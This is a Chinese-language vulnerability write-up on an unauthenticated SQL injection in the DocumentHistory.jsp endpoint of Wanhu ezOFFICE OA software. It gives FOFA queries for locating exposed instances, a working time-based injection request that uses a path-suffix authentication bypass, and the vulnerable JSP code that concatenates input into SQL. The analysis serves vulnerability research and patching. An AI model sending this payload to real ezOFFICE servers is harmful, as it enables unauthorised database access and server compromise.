0x01 产品简介
万户OA ezoffice 是万户网络协同办公产品多年来一直将主要精力致力于中高端市场的一款OA协同办公软件产品,统一的基础管理平台,实现用户数据统一管理、权限统一分配、身份统一认证。统一规划门户网站群和协同办公平台,将外网信息维护、客户服务、互动交流和日常工作紧密结合起来,有效提高工作效率。
0x02 漏洞概述
万户 ezOFFICE DocumentHistory.jsp 接口存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。
0x03 复现环境
本地环境 OR FOFA:app="ezOFFICE协同管理平台" || app="万户ezOFFICE协同管理平台" || app="万户网络-ezOFFICE"
漏洞复现
GET /defaultroot/public/iSignatureHTML.jsp/DocumentHistory.jsp;.js?DocumentID=1'+WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: 192.168.22.187:7001
漏洞分析
关于鉴权绕过,参考这篇文章:万户 ezOFFICE ajax_checkUserNum.jsp SQL注入漏洞
public/iSignatureHTML.jsp/DocumentHistory.jsp 代码如下,非常简单!
<%
DocumentID=request.getParameter("DocumentID"); //取得编号
%>
......
<%
if (ObjConnBean.OpenConnection()) {
ResultSet rs = null;
Statement stmt = null;
System.out.println(DocumentID);
System.out.println("开始");
try {
String strSql = "select * from HTMLHistory Where DocumentID='" + DocumentID + "'"+"order by SignatureID desc";
rs = ObjConnBean.ExecuteQuery(strSql);
System.out.println("错误");
while (rs.next()){
%>
DocumentID 通过 request.getParameter 获取后直接拼接进 SQL 语句,然后执行,造成SQL注入漏洞,也是这么朴实无华!
最后
其他万户OA 相关漏洞
万户 ezOFFICE selectAmountField.jsp SQL注入漏洞



